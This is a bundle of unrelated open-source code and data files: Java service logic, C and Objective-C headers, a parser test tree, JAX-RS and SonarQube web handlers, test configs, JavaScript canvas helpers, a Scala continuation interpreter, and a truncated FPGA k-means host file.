            flag = this.designDao.batchUpdate(designList);
            if (!flag) {
                result.setError(ResultCode.CODE_STATE_4006, "更新报价状态信息失败");
                throw new ServiceException("更新报价状态信息失败");
            }
        } else {
            result.setError(ResultCode.CODE_STATE_4006, "更新预约状态信息失败");
            return result;
        }
        // Satisfied: create one order per design, then redeem the coupon.
        if (isSatisfy) {
            if (designList != null && designList.size() > 0) {
                for (int i = 0; i < designList.size(); i++) {
                    DesignVo designVo = designList.get(i);
                    OrderVo orderVo = new OrderVo();
                    orderVo.setAppointId(appointId);
                    orderVo.setAppointNo(appointVo.getBillCode());
                    orderVo.setMobilePhone(appointVo.getMobilePhone());
                    orderVo.setName(appointVo.getName());
                    orderVo.setProvince(appointVo.getProvince());
                    orderVo.setProvinceId(appointVo.getProvinceId());
                    orderVo.setCity(appointVo.getCity());
                    orderVo.setCityId(appointVo.getCityId());
                    orderVo.setArea(appointVo.getArea());
                    orderVo.setAreaId(appointVo.getAreaId());
                    orderVo.setAddress(appointVo.getAddress());
                    orderVo.setDecorateProject(appointVo.getDecorateProject());
                    orderVo.setDecorateProjectTypes(appointVo.getDecorateProjectTypes());
                    orderVo.setDesignId(designVo.getId());
                    orderVo.setDesignNo(designVo.getBillCode());
                    orderVo.setDesignType(designVo.getDesignType());
                    result = this.orderService.addOrder(orderVo, i);
                    if (!result.isSuccess()) {
                        throw new ServiceException("添加订单失败");
                    }
                }
            }
            // Coupon supplied: attach its value to the first design's
            // quotation and mark the coupon as used.
            if (couponDetailVo != null && couponUserRelations != null) {
                QuotationVo firstQuotationVo = this.quotationService.getByDesignId(designList.get(0).getId());
                if (firstQuotationVo != null) {
                    QuotationVo updateQuotationVo = new QuotationVo();
                    updateQuotationVo.setId(firstQuotationVo.getId());
                    updateQuotationVo.setCouponValue(couponDetailVo.getCouponValue()); // coupon value
                    updateQuotationVo.setCouponId(couponUserRelations.getId());        // user-coupon relation id
                    flag = this.quotationService.edit(updateQuotationVo);
                    if (!flag) {
                        result.setError(ResultCode.CODE_STATE_4006, "更新报价单优惠券信息失败");
                        throw new ServiceException("更新报价单优惠券信息失败");
                    }
                    couponUserRelations.setIsUsed(1); // mark used
                    couponUserRelations.setUsedTime(new Date());
                    flag = this.couponUserRelationsService.edit(couponUserRelations);
                    if (!flag) {
                        result.setError(ResultCode.CODE_STATE_4006, "更新优惠券状态失败");
                        throw new ServiceException("更新优惠券状态失败");
                    }
                } else {
                    result.setError(ResultCode.CODE_STATE_4006, "获取报价单信息失败");
                    throw new ServiceException("获取报价单信息失败");
                }
            }
        }
        result.setOK(ResultCode.CODE_STATE_200, "操作成功");
        return result;
    }
}
| {
"pile_set_name": "Github"
} |
/*
BLIS
An object-based framework for developing high-performance BLAS-like
libraries.
Copyright (C) 2014, The University of Texas at Austin
Copyright (C) 2016, Hewlett Packard Enterprise Development LP
Copyright (C) 2018, Advanced Micro Devices, Inc.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name(s) of the copyright holder(s) nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef BLIS_ENV_H
#define BLIS_ENV_H

// Look up the environment variable named 'env' and return it as a gint_t;
// if the variable is not set, return 'fallback' instead.
// NOTE(review): exact parse/error behavior lives in the implementation file —
// confirm there before relying on anything beyond the unset->fallback case.
gint_t bli_env_get_var( const char* env, gint_t fallback );
// Setter counterpart is currently disabled upstream.
//void bli_env_set_var( const char* env, dim_t value );
#endif
| {
"pile_set_name": "Github"
} |
# Locally calculated
sha256 4a1532bcf3731aade40936f6d6a586ed5a66ca4c7455e1338d1f6c3e09221328 libcap-ng-0.7.9.tar.gz
sha256 32b1062f7da84967e7019d01ab805935caa7ab7321a7ced0e30ebe75e5df1670 COPYING
sha256 f18a0811fa0e220ccbc42f661545e77f0388631e209585ed582a1c693029c6aa COPYING.LIB
| {
"pile_set_name": "Github"
} |
//
// KxAudioManager.h
// kxmovie
//
// Created by Kolyvan on 23.10.12.
// Copyright (c) 2012 Konstantin Boukreev . All rights reserved.
//
// https://github.com/kolyvan/kxmovie
// this file is part of KxMovie
// KxMovie is licenced under the LGPL v3, see lgpl-3.0.txt
#import <CoreFoundation/CoreFoundation.h>
// Callback that fills/consumes audio output: (sample buffer, frame count, channel count).
typedef void (^KxAudioManagerOutputBlock)(float *data, UInt32 numFrames, UInt32 numChannels);

// Abstract audio-manager contract implemented by the platform backend.
@protocol KxAudioManager <NSObject>
// Number of output channels
@property (readonly) UInt32 numOutputChannels;
// Sampling rate
@property (readonly) Float64 samplingRate;
// Bytes per sample
@property (readonly) UInt32 numBytesPerSample;
// Output volume
@property (readonly) Float32 outputVolume;
// Whether audio is currently playing
@property (readonly) BOOL playing;
// Current audio route
@property (readonly, strong) NSString *audioRoute;
// Output callback invoked with (data, numFrames, numChannels)
@property (readwrite, copy) KxAudioManagerOutputBlock outputBlock;
// Activate the audio session
- (BOOL) activateAudioSession;
// Deactivate the audio session
- (void) deactivateAudioSession;
// Start playback
- (BOOL) play;
// Pause playback
- (void) pause;
@end

// Accessor for the shared audio-manager implementation — presumably a
// singleton; confirm in the implementation file.
@interface KxAudioManager : NSObject
+ (id<KxAudioManager>) audioManager;
@end
| {
"pile_set_name": "Github"
} |
Elixir File(0,74)
UNMATCHED_UNQUALIFIED_NO_ARGUMENTS_CALL(0,23)
ElixirIdentifierImpl(IDENTIFIER)(0,10)
PsiElement(identifier)('identifier')(0,10)
PsiWhiteSpace(' ')(10,11)
ElixirDoBlockImpl(DO_BLOCK)(11,23)
PsiElement(do)('do')(11,13)
PsiWhiteSpace(' ')(13,14)
ElixirBlockListImpl(BLOCK_LIST)(14,19)
ElixirBlockItemImpl(BLOCK_ITEM)(14,19)
ElixirBlockIdentifierImpl(BLOCK_IDENTIFIER)(14,19)
PsiElement(catch)('catch')(14,19)
PsiWhiteSpace(' ')(19,20)
PsiElement(end)('end')(20,23)
ElixirEndOfExpressionImpl(END_OF_EXPRESSION)(23,24)
PsiElement(\\n, \\r\\n)('\n')(23,24)
UNMATCHED_UNQUALIFIED_NO_ARGUMENTS_CALL(24,48)
ElixirIdentifierImpl(IDENTIFIER)(24,34)
PsiElement(identifier)('identifier')(24,34)
PsiWhiteSpace(' ')(34,35)
ElixirDoBlockImpl(DO_BLOCK)(35,48)
PsiElement(do)('do')(35,37)
PsiWhiteSpace(' ')(37,38)
ElixirBlockListImpl(BLOCK_LIST)(38,44)
ElixirBlockItemImpl(BLOCK_ITEM)(38,44)
ElixirBlockIdentifierImpl(BLOCK_IDENTIFIER)(38,43)
PsiElement(catch)('catch')(38,43)
ElixirEndOfExpressionImpl(END_OF_EXPRESSION)(43,44)
PsiElement(;)(';')(43,44)
PsiWhiteSpace(' ')(44,45)
PsiElement(end)('end')(45,48)
ElixirEndOfExpressionImpl(END_OF_EXPRESSION)(48,49)
PsiElement(\\n, \\r\\n)('\n')(48,49)
UNMATCHED_UNQUALIFIED_NO_ARGUMENTS_CALL(49,74)
ElixirIdentifierImpl(IDENTIFIER)(49,59)
PsiElement(identifier)('identifier')(49,59)
PsiWhiteSpace(' ')(59,60)
ElixirDoBlockImpl(DO_BLOCK)(60,74)
PsiElement(do)('do')(60,62)
PsiWhiteSpace('\n ')(62,65)
ElixirBlockListImpl(BLOCK_LIST)(65,70)
ElixirBlockItemImpl(BLOCK_ITEM)(65,70)
ElixirBlockIdentifierImpl(BLOCK_IDENTIFIER)(65,70)
PsiElement(catch)('catch')(65,70)
PsiWhiteSpace('\n')(70,71)
PsiElement(end)('end')(71,74)
| {
"pile_set_name": "Github"
} |
/*
* Knowage, Open Source Business Intelligence suite
* Copyright (C) 2016 Engineering Ingegneria Informatica S.p.A.
*
* Knowage is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Knowage is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package it.eng.spagobi.rest.interceptors;
import java.io.IOException;
import javax.servlet.http.HttpServletResponse;
import javax.ws.rs.container.ContainerRequestContext;
import javax.ws.rs.container.ContainerResponseContext;
import javax.ws.rs.container.ContainerResponseFilter;
import javax.ws.rs.core.Context;
import javax.ws.rs.ext.Provider;
import org.apache.log4j.Logger;
/**
* This interceptor injects into HTTP response headers information to disable browser cache, in case the response does not already contain any header about
* cache, i.e. "CacheControl", "Pragma" and "Expires".
*
* @author Davide Zerbetto ([email protected])
*
*/
@Provider
public class NoCacheInterceptor implements ContainerResponseFilter {

	private static Logger logger = Logger.getLogger(NoCacheInterceptor.class);

	@Context
	private HttpServletResponse httpResponse;

	/**
	 * Injects browser cache-busting headers into the HTTP response, but only when
	 * the response does not already define its own caching policy.
	 *
	 * BUGFIX: the standard HTTP header is "Cache-Control"; the previous code used
	 * "CacheControl", which is not a real header and is ignored by browsers, so
	 * responses were still cacheable.
	 *
	 * @param requestContext  the incoming JAX-RS request context (unused)
	 * @param responseContext the outgoing JAX-RS response context
	 */
	@Override
	public void filter(ContainerRequestContext requestContext, ContainerResponseContext responseContext) throws IOException {
		logger.debug("IN");
		// Respect any caching policy already set upstream: only add headers when
		// none of the three cache-related headers is present.
		if (!httpResponse.containsHeader("Cache-Control") && !httpResponse.containsHeader("Pragma") && !httpResponse.containsHeader("Expires")) {
			httpResponse.setHeader("Cache-Control", "no-cache");
			httpResponse.setHeader("Pragma", "no-cache");
			// "-1" forces the resource to be considered already expired.
			httpResponse.setHeader("Expires", "-1");
		}
		logger.debug("OUT");
	}
}
| {
"pile_set_name": "Github"
} |
/*
* SonarQube
* Copyright (C) 2009-2020 SonarSource SA
* mailto:info AT sonarsource DOT com
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
package org.sonar.server.usergroups.ws;
import org.sonar.api.server.ws.Change;
import org.sonar.api.server.ws.Request;
import org.sonar.api.server.ws.Response;
import org.sonar.api.server.ws.WebService;
import org.sonar.api.server.ws.WebService.NewController;
import org.sonar.db.DbClient;
import org.sonar.db.DbSession;
import org.sonar.db.permission.OrganizationPermission;
import org.sonar.db.user.GroupDto;
import org.sonar.server.user.UserSession;
import static com.google.common.base.Preconditions.checkArgument;
import static java.lang.String.format;
import static org.sonar.server.usergroups.ws.GroupWsSupport.PARAM_GROUP_ID;
import static org.sonar.server.usergroups.ws.GroupWsSupport.PARAM_GROUP_NAME;
import static org.sonar.server.usergroups.ws.GroupWsSupport.defineGroupWsParameters;
/**
 * Web-service action that deletes a user group together with every reference
 * to it: group permissions, permission-template links, quality-profile edit
 * rights and user memberships. Default groups and the last group holding the
 * system-administration permission cannot be deleted.
 */
public class DeleteAction implements UserGroupsWsAction {

  private final DbClient dbClient;
  private final UserSession userSession;
  private final GroupWsSupport support;

  public DeleteAction(DbClient dbClient, UserSession userSession, GroupWsSupport support) {
    this.dbClient = dbClient;
    this.userSession = userSession;
    this.support = support;
  }

  /**
   * Declares the POST {@code delete} action (since 5.2). The caller supplies
   * either the group id or the group name; parameters are registered by
   * {@code defineGroupWsParameters}.
   */
  @Override
  public void define(NewController context) {
    WebService.NewAction action = context.createAction("delete")
      .setDescription(format("Delete a group. The default groups cannot be deleted.<br/>" +
        "'%s' or '%s' must be provided.<br />" +
        "Requires the following permission: 'Administer System'.",
        PARAM_GROUP_ID, PARAM_GROUP_NAME))
      .setHandler(this)
      .setSince("5.2")
      .setPost(true)
      .setChangelog(
        new Change("8.4", "Parameter 'id' is deprecated. Format changes from integer to string. Use 'name' instead."));

    defineGroupWsParameters(action);
  }

  /**
   * Resolves the group, checks permissions and guards, then removes all rows
   * referencing the group before deleting the group itself.
   * NOTE: the removal order matters — dependent rows (permissions, template
   * links, memberships, qprofile edit rights) are deleted before the group
   * row, and everything is committed in a single transaction.
   */
  @Override
  public void handle(Request request, Response response) throws Exception {
    try (DbSession dbSession = dbClient.openSession(false)) {
      GroupDto group = support.findGroupDto(dbSession, request);

      // Caller must administer the organization owning the group.
      userSession.checkPermission(OrganizationPermission.ADMINISTER, group.getOrganizationUuid());
      support.checkGroupIsNotDefault(dbSession, group);
      checkNotTryingToDeleteLastAdminGroup(dbSession, group);

      removeGroupPermissions(dbSession, group);
      removeFromPermissionTemplates(dbSession, group);
      removeGroupMembers(dbSession, group);
      dbClient.qProfileEditGroupsDao().deleteByGroup(dbSession, group);
      dbClient.groupDao().deleteByUuid(dbSession, group.getUuid());

      dbSession.commit();
      // 204 No Content: deletion succeeded, nothing to return.
      response.noContent();
    }
  }

  /**
   * Fails with an IllegalArgumentException when deleting this group would
   * leave no user with the global "Administer System" permission.
   */
  private void checkNotTryingToDeleteLastAdminGroup(DbSession dbSession, GroupDto group) {
    int remaining = dbClient.authorizationDao().countUsersWithGlobalPermissionExcludingGroup(dbSession,
      group.getOrganizationUuid(), OrganizationPermission.ADMINISTER.getKey(), group.getUuid());

    checkArgument(remaining > 0, "The last system admin group cannot be deleted");
  }

  // Delete all permission rows granted to the group.
  private void removeGroupPermissions(DbSession dbSession, GroupDto group) {
    dbClient.roleDao().deleteGroupRolesByGroupUuid(dbSession, group.getUuid());
  }

  // Detach the group from all permission templates.
  private void removeFromPermissionTemplates(DbSession dbSession, GroupDto group) {
    dbClient.permissionTemplateDao().deleteByGroup(dbSession, group.getUuid());
  }

  // Remove all user memberships of the group.
  private void removeGroupMembers(DbSession dbSession, GroupDto group) {
    dbClient.userGroupDao().deleteByGroupUuid(dbSession, group.getUuid());
  }
}
| {
"pile_set_name": "Github"
} |
{ "expected-missing-functions":
[
"vLoggingPrintf",
"xApplicationGetRandomNumber",
"vListInsertEnd",
"vTaskSetTimeOutState",
"vTaskSuspendAll",
"xTaskGetTickCount",
"xTaskResumeAll"
],
"proof-name": "DNSgetHostByName_a",
"proof-root": "tools/cbmc/proofs"
}
| {
"pile_set_name": "Github"
} |
// Setup a very simple "virtual canvas" to make drawing the few shapes we need easier
// This is accessible as $(foo).simpledraw()
// Lightweight record describing one drawing primitive queued on a virtual
// canvas. Instances are produced by the canvas (see _genShape) and rendered
// later by the concrete canvas implementation.
VShape = createClass({
    // Store the owning canvas, the queue id, the shape-type name
    // ('Shape', 'Circle', 'PieSlice', 'Rect') and the draw arguments.
    init: function (target, id, type, args) {
        var fields = { target: target, id: id, type: type, args: args },
            key;
        for (key in fields) {
            this[key] = fields[key];
        }
    },
    // Queue this shape on its canvas; returns this to allow chaining.
    append: function () {
        this.target.appendShape(this);
        return this;
    }
});
// Abstract base class for the "virtual canvas". It provides the shared
// drawing helpers, pixel-dimension handling and shape-id bookkeeping;
// concrete subclasses implement the render queue (appendShape, render, ...).
VCanvas_base = createClass({
    // Matches a trailing pixel size such as "120" or "120px".
    _pxregex: /(\d+)(px)?\s*$/i,

    init: function (width, height, target) {
        if (!width) {
            return;
        }
        this.width = width;
        this.height = height;
        this.target = target;
        this.lastShapeId = null;
        if (target[0]) {
            target = target[0];
        }
        // Attach this canvas to the DOM element so it can be looked up later.
        $.data(target, '_jqs_vcanvas', this);
    },

    drawLine: function (x1, y1, x2, y2, lineColor, lineWidth) {
        // BUGFIX: drawShape's signature is (path, lineColor, fillColor,
        // lineWidth); the old code passed lineWidth in the fillColor slot,
        // so the requested width was silently dropped. A line has no fill,
        // hence the explicit undefined placeholder.
        return this.drawShape([[x1, y1], [x2, y2]], lineColor, undefined, lineWidth);
    },

    // Each draw* helper only queues a shape description; nothing is rendered
    // until the subclass renders the queue.
    drawShape: function (path, lineColor, fillColor, lineWidth) {
        return this._genShape('Shape', [path, lineColor, fillColor, lineWidth]);
    },

    drawCircle: function (x, y, radius, lineColor, fillColor, lineWidth) {
        return this._genShape('Circle', [x, y, radius, lineColor, fillColor, lineWidth]);
    },

    drawPieSlice: function (x, y, radius, startAngle, endAngle, lineColor, fillColor) {
        return this._genShape('PieSlice', [x, y, radius, startAngle, endAngle, lineColor, fillColor]);
    },

    drawRect: function (x, y, width, height, lineColor, fillColor) {
        return this._genShape('Rect', [x, y, width, height, lineColor, fillColor]);
    },

    getElement: function () {
        return this.canvas;
    },

    /**
     * Return the most recently inserted shape id
     */
    getLastShapeId: function () {
        return this.lastShapeId;
    },

    /**
     * Clear and reset the canvas
     */
    reset: function () {
        alert('reset not implemented');
    },

    _insert: function (el, target) {
        $(target).html(el);
    },

    /**
     * Calculate the pixel dimensions of the canvas. Sizes given as "Npx"
     * (or bare numbers) are taken literally; anything else (e.g. "50%")
     * falls back to the element's measured size.
     */
    _calculatePixelDims: function (width, height, canvas) {
        // XXX This should probably be a configurable option
        var match;
        match = this._pxregex.exec(height);
        if (match) {
            this.pixelHeight = match[1];
        } else {
            this.pixelHeight = $(canvas).height();
        }
        match = this._pxregex.exec(width);
        if (match) {
            this.pixelWidth = match[1];
        } else {
            this.pixelWidth = $(canvas).width();
        }
    },

    /**
     * Generate a shape object and id for later rendering.
     * Uses the module-level shapeCount counter for unique ids.
     */
    _genShape: function (shapetype, shapeargs) {
        var id = shapeCount++;
        shapeargs.unshift(id);
        return new VShape(this, id, shapetype, shapeargs);
    },

    /**
     * Add a shape to the end of the render queue (subclass responsibility).
     */
    appendShape: function (shape) {
        alert('appendShape not implemented');
    },

    /**
     * Replace one shape with another (subclass responsibility).
     */
    replaceWithShape: function (shapeid, shape) {
        alert('replaceWithShape not implemented');
    },

    /**
     * Insert one shape after another in the render queue (subclass responsibility).
     */
    insertAfterShape: function (shapeid, shape) {
        alert('insertAfterShape not implemented');
    },

    /**
     * Remove a shape from the queue (subclass responsibility).
     */
    removeShapeId: function (shapeid) {
        alert('removeShapeId not implemented');
    },

    /**
     * Find a shape at the specified x/y co-ordinates (subclass responsibility).
     */
    getShapeAt: function (el, x, y) {
        alert('getShapeAt not implemented');
    },

    /**
     * Render all queued shapes onto the canvas (subclass responsibility).
     */
    render: function () {
        alert('render not implemented');
    }
});
| {
"pile_set_name": "Github"
} |
description: "Handle a not-ok ismaster response"
uri: "mongodb://a"
phases: [
{
responses: [
["a:27017", {
ok: 1,
ismaster: true,
minWireVersion: 0,
maxWireVersion: 6
}],
["a:27017", {
ok: 0,
ismaster: true,
minWireVersion: 0,
maxWireVersion: 6
}]
],
outcome: {
servers: {
"a:27017": {
type: "Unknown",
setName:
}
},
topologyType: "Single",
logicalSessionTimeoutMinutes: null,
setName:
}
}
]
| {
"pile_set_name": "Github"
} |
"description_1" : "<span class=\"translated\">If the switching command is detected, the selected MP3 file is played with the specified volume and stopped with the next detection (toggle function).</span><br/><br/>",
"description_2" : "<span class=\"translated\">" +
"The switching command 'Dry conditions' plays the selected MP3 file with the defined volume in dry conditions, in case of rain the MP3 is stopped. " +
"The switching command 'Rain' plays the selected MP3 file with the defined volume in case of rain, in dry conditions the MP3 is stopped." +
"</span><br/><br/>",
"description_3" : "<span class=\"translated\">The profile is not active.</span>",
"subset_1" : "Rain - off / dry conditions - on",
"subset_2" : "Rain - on / dry conditions - off",
"subset_3" : "Dry conditions",
"subset_4" : "Rain",
"subset_6" : "Rain - on/off",
"subset_7" : "Dry conditions - on/off",
"_at" : "<span class=\"translated\">when</span>",
| {
"pile_set_name": "Github"
} |
object callccInterpreter {
// The final answer produced by running a monadic computation.
// NOTE(review): the /*?*/ and /*!*/ markers in this file look like
// position-sensitive compiler-test fixtures — confirm before reformatting.
type Answer = Value
/**
* A continuation monad: wraps a computation that, given a continuation
* (A => Answer), produces the final Answer.
*/
case class M[A](in: (A => Answer) => Answer) {
// Monadic bind: run this computation, then feed its result into k.
def bind[B](k: A => M[B]) = M[B](c => in (a => k(a) in c))
def map[B](f: A => B): M[B] = bind(x => unitM(f(x)))
def flatMap[B](f: A => M[B]): M[B] = bind(f)
}
// unit / return: inject a pure value into the monad.
def unitM[A](a: A) /*?*/ = M[A](c => c(a))
// Polymorphic identity, used as the top-level continuation.
def id[A] /*?*/ = (x: A) => x
// Run a computation to completion and render its Value as a String.
def showM(m: M[Value]) /*?*/ = (m in id).toString()
// call-with-current-continuation for this monad: h receives the captured
// continuation reified as a function A => M[A].
def callCC[A](h: (A => M[A]) => M[A]) =
M[A](c => h(a => M[A](d => c(a))) in c)
// Variable names of the object language.
type Name = String
// Abstract syntax of the interpreted lambda-calculus.
trait Term
case class Var(x: Name) extends Term
// Integer constant (note the legacy lowercase `int` of early Scala).
case class Con(n: int) extends Term
case class Add(l: Term, r: Term) extends Term
case class Lam(x: Name, body: Term) extends Term
case class App(fun: Term, arg: Term) extends Term
// call/cc binder: binds the current continuation to x inside t.
case class Ccc(x: Name, t: Term) extends Term
// Runtime values produced by the interpreter.
trait Value
// Error value returned for ill-typed programs.
case object Wrong extends Value {
override def toString() = "wrong"
}
case class Num(n: Int) extends Value {
override def toString() = n.toString()
}
case class Fun(f: Value => M[Value]) extends Value {
override def toString() = "<function>"
}
// Environments map names to values, most recent binding first.
type Environment = List[Pair[Name, Value]]
// Look up x in the environment; yields Wrong when unbound.
def lookup(x: Name, e: Environment): M[Value] = e match {
case List() => unitM(Wrong)
case Pair(y, b) :: e1 => if (x == y) unitM(b) else lookup(x, e1)
}
// Numeric addition; any non-numeric operand yields Wrong.
def add(a: Value, b: Value) /*?*/ = Pair(a, b) match {
case Pair(Num(m), Num(n)) => this./*!*/unitM(Num(m + n))
case _ => unitM(Wrong)
}
// Function application; applying a non-function yields Wrong.
def apply(a: Value, b: Value): M[Value] = a match {
case Fun(k) => k(b)
case _ => unitM(Wrong)
}
// The interpreter proper: structural recursion over the term, threading
// the environment and sequencing effects through the continuation monad.
def interp(t: Term, e: Environment): M[Value] = t match {
case Var(x) => lookup(x, e)
case Con(n) => unitM(Num(n))
case Add(l, r) => for (val a <- interp(l, e);
val b <- interp(r, e);
val c <- add(a, b))
yield c
case Lam(x, t) => unitM(Fun(a => interp(t, Pair(x, a) :: e)))
case App(f, t) => for (val a <- interp(f, e);
val b <- interp(t, e);
val c <- apply(a, b))
yield c
// Reify the current continuation as a Fun value bound to x.
case Ccc(x, t) => callCC(k => interp(t, Pair(x, Fun(k)) :: e))
}
// Interpret a closed term in the empty environment and render the result.
def test(t: Term): String = showM(interp(t, List()))
// (\x. x + x) (10 + 11)  — evaluates to 42.
val term0 = App(Lam("x", Add(Var("x"), Var("x"))), Add(Con(10), Con(11)))
// Applying a number as a function — evaluates to "wrong".
val term1 = App(Con(1), Con(2))
// 1 + (callcc k. 2 + k(4)) — the continuation discards the pending 2+_,
// so this evaluates to 5.
val term2 = Add(Con(1), Ccc("k", Add(Con(2), App(Var("k"), Con(4)))))
def main(args: Array[String]) {
println(test(term0))
println(test(term1))
println(test(term2))
}
} | {
"pile_set_name": "Github"
} |
/**********
Copyright (c) 2018, Xilinx, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**********/
#include "fpga_kmeans.h"
#include "kmeans.h"
#include "xcl2.hpp"
#include <iostream>
// Selectable element type for the device buffers: FLOAT_DT keeps raw floats,
// INT_DT rescales floats into integers (see calculate_scale_factor below).
// USE_DATA_TYPE is expected to be supplied by the build system.
#define FLOAT_DT 0
#define INT_DT 1
// Number of OpenCL work-groups launched by fpga_kmeans_compute.
#define WORK_GROUP 2
#if USE_DATA_TYPE == INT_DT
#define DATA_TYPE unsigned int
#define INT_DATA_TYPE int
#else
#define DATA_TYPE float
#define INT_DATA_TYPE int
#endif
//Global Variables
int g_global_size = 1;     // requested global work size (reporting only)
int g_vector_size = 16;    // vector width used to pad features/points
float g_scale_factor = 1.0; // float->int scale factor (INT_DT build only)
#if USE_DATA_TYPE == INT_DT
// Scan 'mem' (size elements) for its min/max and set g_scale_factor so the
// whole value range maps onto 24 bits (0x00FFFFFF).  Must run before any
// call to scaled_float2int().
static void calculate_scale_factor(float *mem, int size) {
    float min = mem[0];
    float max = mem[0];
    for (int i = 0; i < size; i++) {
        float value = mem[i];
        if (value < min)
            min = value;
        if (value > max)
            max = value;
    }
    float diff = max - min;
    g_scale_factor = diff / 0x00FFFFFF;
    printf("Float to Integer Scale Factor = %f MaxFloat=%f and MinFloat=%f \n",
           g_scale_factor,
           max,
           min);
}

// Quantise a float using the precomputed global scale factor.
// NOTE(review): the float->int conversion truncates toward zero; confirm
// that rounding is not required by the kernel.
static int scaled_float2int(float value) {
    int ret_value;
    float fv = value;
    float scaled_value = fv / g_scale_factor;
    ret_value = scaled_value;
    return ret_value;
}
#endif
// Pack the row-major cluster-centre matrix into a freshly malloc'd buffer
// whose per-cluster feature stride is padded from n_features up to
// N_Features; the padding slots are zero-filled.  On the INT_DT build each
// value is rescaled via scaled_float2int().  Caller owns the returned buffer.
static DATA_TYPE *re_align_clusters(float **clusters,
                                    int n_clusters,
                                    int N_Features,
                                    int n_features) {
    DATA_TYPE *aligned =
        (DATA_TYPE *)malloc(n_clusters * N_Features * sizeof(DATA_TYPE));
    if (aligned == NULL) {
        fprintf(stderr, "Error: Failed to allocate memory for temp_clusters\n");
        exit(EXIT_FAILURE);
    }
    DATA_TYPE *dst = aligned;
    for (int cid = 0; cid < n_clusters; cid++) {
        for (int fid = 0; fid < N_Features; fid++) {
            if (fid >= n_features) {
                // Padding beyond the real feature count.
                *dst++ = 0.0;
                continue;
            }
            float fValue = clusters[0][cid * n_features + fid];
#if USE_DATA_TYPE == INT_DT
            *dst++ = scaled_float2int(fValue);
#else
            *dst++ = fValue;
#endif
        }
    }
    return aligned;
}
// Re-lay-out the point/feature matrix from row-major [point][feature] into a
// blocked, vector-friendly layout: for each block of `size` points, all
// values of feature 0 first, then feature 1, etc.  Points beyond n_points
// inside the padded NPoints range are zero-filled.  Caller frees the result.
// NOTE(review): the N_Features parameter is accepted but never used here —
// confirm whether the allocation should use it instead of n_features.
static DATA_TYPE *re_align_features(float **feature,
                                    int N_Features,
                                    int NPoints,
                                    int n_features,
                                    int n_points,
                                    int size) {
    int next_feature = 0;
    DATA_TYPE *temp_feature =
        (DATA_TYPE *)malloc(NPoints * n_features * sizeof(DATA_TYPE));
    if (temp_feature == NULL) {
        fprintf(stderr, "Error: Failed to allocate memory for temp_feature\n");
        exit(EXIT_FAILURE);
    }
    // Walk points in blocks of `size`, emitting each feature contiguously
    // for the whole block.
    for (int pid = 0; pid < NPoints; pid += size) {
        for (int fid = 0; fid < n_features; fid++) {
            for (int tpid = 0; tpid < size; tpid++) {
                if (pid + tpid < n_points) {
                    float fValue = feature[0][(pid + tpid) * n_features + fid];
                    DATA_TYPE value;
#if USE_DATA_TYPE == INT_DT
                    value = scaled_float2int(fValue);
#else
                    value = fValue;
#endif
